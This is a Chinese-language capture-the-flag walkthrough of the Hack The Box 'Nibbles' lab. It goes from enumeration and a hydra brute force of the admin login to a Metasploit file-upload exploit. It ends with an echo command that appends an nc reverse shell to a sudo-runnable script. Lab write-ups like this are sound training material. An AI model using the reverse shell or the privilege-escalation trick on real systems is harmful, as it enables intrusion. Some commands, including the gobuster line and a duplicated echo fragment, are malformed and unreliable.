HACKTHEBOX——Nibbles
nmap
同样的,先用nmap探测目标端口开放情况
nmap -sV -sC -oA nmap 10.10.10.75
可以看到开启了80端口,先探索一下http服务,寻找更多内容
http服务
没有什么有用的发现,只是一个很简单的hello world
根据burpsuite抓的包可以看到apache的版本内容以及一个目录/nibbleblog
根据提示目录可以看到一个展示页面,页面右下角有一个powerd by nibbleblog
很可能是一个博客框架,借助浏览器可以知道确实是一个博客系统,据查也可以得知v4.0.5版本存在很多漏洞,鉴于目前并不能知道靶机使用版本,因此尝试执行目录扫描
gobuster
直接对/nibbleblog进行目录的暴力枚举
gobuster dir -u http://10.10.10.75/nibbleblog/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w / -x txt,php -t 50 -k -o gobuster
/admin.php
是一个登录页面
在/content/private/user.xml中找到用户名,尝试暴力破解
使用hydra针对用户名amdin进行暴力破解,猜测用户名与nibbles相关,加入字典中执行暴力破解,最终得到用户名和密码
暴力破解触发零 保护机制,重新将靶机还原使用用户名和密码登录系统后,界面如下
metasploit
在settings中可以看到博客版本信息
并且该版本有一个任意文件上传漏洞
然后根据相关信息设置配置项
然后执行即可,并获取交互式shell
user.txt
CVE-2015-6967
提权
鉴于之前的靶场,直接sudo -l
先把personal.zip解压,然后查看该文件内容
在文件末尾添加,然后运行该文件即可
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.154 8083 > /tmp/f" >> monitor.sh < /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.154 8083 > /tmp/f" >> monitor.sh
HACKTHEBOX——Nibbles相关推荐
- sqlmap md5怎么解密_三十九,hackthebox渗透之DirBuster扫描路径及Sqlmap
一.DirBuster扫描目录 hack the box是一个在线Web渗透实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有.因为这些靶机放在平台上供大 ...
- Hackthebox(1)系列持续更新
Hackthebox第一关 文章目录 Hackthebox第一关 一.Hackthebox配置openvpn 配置openvpn 二.第0层(简单) 终端弄好以后点击产卵机,然后会给你创建一个实例 问 ...
- HackTheBox MetaTwo 网站框架CVE获取用户shell和破解私钥提权
题目网址: https://app.hackthebox.com/machines/MetaTwo 枚举 使用nmap枚举靶机 nmap -sC -sV -p- 10.10.11.186 扫到了域名, ...
- HackTheBox 如何使用
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start ...
- HackTheBox –Craft实战
HackTheBox –Craft ip:http://10.10.10.110/ 信息搜集 端口扫描:使用nmap扫描发现开了22(ssh)端口和443(http/ssl) 版本可从web网页上获取 ...
- CTF-Anubis HackTheBox 渗透测试(二)
大家好,我是你们好朋友小峰.预计从今天开始,陆陆续续为大家推出 CTF-Horizontall HackTheBox 系列文章. 0x01 简介 Anubis是由作者4ndr34z在Hac ...
- Hackthebox:Arctic Walkthrough
预备知识 使用了msfvenom,不想看的可以跳过 浏览器信息收集尤其是细节发现服务信息不能过度依赖工具 MS10-059.smbserver.jsp reverse shell 信息收集和获取立足点 ...
- hackthebox的网站使用教程
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获 ...
- 小黑客,2020还没有邀请码注册 hackthebox ?reCAPTCHA验证码加载不出来?
访问邀请码页面 https://www.hackthebox.eu/invite F12控制台输入 $.post('https://www.hackthebox.eu/api/invite/gener ...
最新文章
- 关于大型网站技术演进的思考(五)--存储的瓶颈(5)
- Dockerfile命令详解
- linux 的git的安装目录,Linux下Git安装及配置较详细-Go语言中文社区
- 理解依赖注入(IOC)
- tfidf算法 python_tf–idf算法解释及其python代码实现(下)
- Oracle distinct后加as,【大话IT】为何加distinct之后就不走索引了
- ue4蓝图和ai的区别_UE4 AI基础
- 2.24. Spring boot with Apache Kafka
- Python Tricks(十四)—— list 逆序的实现
- MsSQL ——模拟limit
- C#中使用Buffer.BlockCopy()方法将string转换为byte array的方法:
- tapestry5的response使用
- 最新凌风云支付系统网站源码全解无后门V4.1.1版本
- 如何使用 身份证归属地查询API
- 雷达的工作原理示意图_雷达基本理论与基本原理
- CSS颜色搭配(超级赞的几个网站)
- 成一单亏一单,医疗电商的苦涩现状
- 使用udp 发送一张jpeg图片,upd接收后转成opencv的Mat格式
- Preempt_RT Linux技术文档(一)技术基础(中英文对照)
- win7如何设置wifi热点_博世壁挂炉“盖世7200i”WiFi功能如何设置